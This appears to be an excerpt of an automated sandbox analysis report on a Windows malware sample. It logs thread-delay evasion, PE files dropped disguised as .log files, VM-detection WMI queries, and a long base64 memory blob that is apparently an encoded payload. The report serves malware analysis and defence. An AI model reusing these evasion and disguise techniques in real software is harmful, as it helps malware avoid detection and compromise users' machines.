Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1ACF0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: C10000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1A920000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1B0F0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 21C0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1A380000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599744	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599591	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599481	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599259	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598907	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598782	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598326	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598217	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 597836	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Window / User API: threadDelayed 1106			Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Window / User API: threadDelayed 2410			Jump to behavior

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GZjfleQD.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LcDwYjoO.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IAvfBIwS.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hKLkytLW.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KGHfuADJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xMRpRwBk.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zIEPhtYo.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eUUurwLd.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YSUUeens.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cbCbMxmL.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CdzqKGoc.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aMXlVeRh.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EOeGRUzU.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HeuFlNGE.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fHYCcKHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bnPvHrDf.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iUeApcrA.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WHyUeLIr.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rpUzavtu.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fzpjyagV.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gvcKOXDZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pZlzyQSG.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XgAKFRwS.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xqQPBCLW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QPVuBgDD.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tzrAaNYu.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iLMKqBdM.log	Jump to dropped file
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YlLkFAlS.log	Jump to dropped file

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599872s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7228	Thread sleep count: 1106 > 30	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599744s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599591s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599481s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7228	Thread sleep count: 2410 > 30	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599259s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7224	Thread sleep time: -597836s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 2128	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 2500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 3736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 7184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 7200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 7484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 7748	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 7636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 7700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 8024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 8052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe TID: 5296	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe TID: 6360	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe

Code function: 0_2_00007FFD9B878B98 GetSystemInfo,

0_2_00007FFD9B878B98

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599744	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599591	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599481	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599259	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598907	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598782	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598326	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598217	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 597836	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: k1iZHyRK6K.exe, 0000002F.00000002.2043589025.00000000124AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]] tW
Source: k1iZHyRK6K.exe, 00000000.00000002.1709544106.000000001BB61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1815775579.00000000009F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: k1iZHyRK6K.exe, 00000000.00000002.1708127093.000000001B296000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: lMBSkpoWMYaHkUMNHfb.exe, 00000023.00000002.1828475236.000000001296D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYESto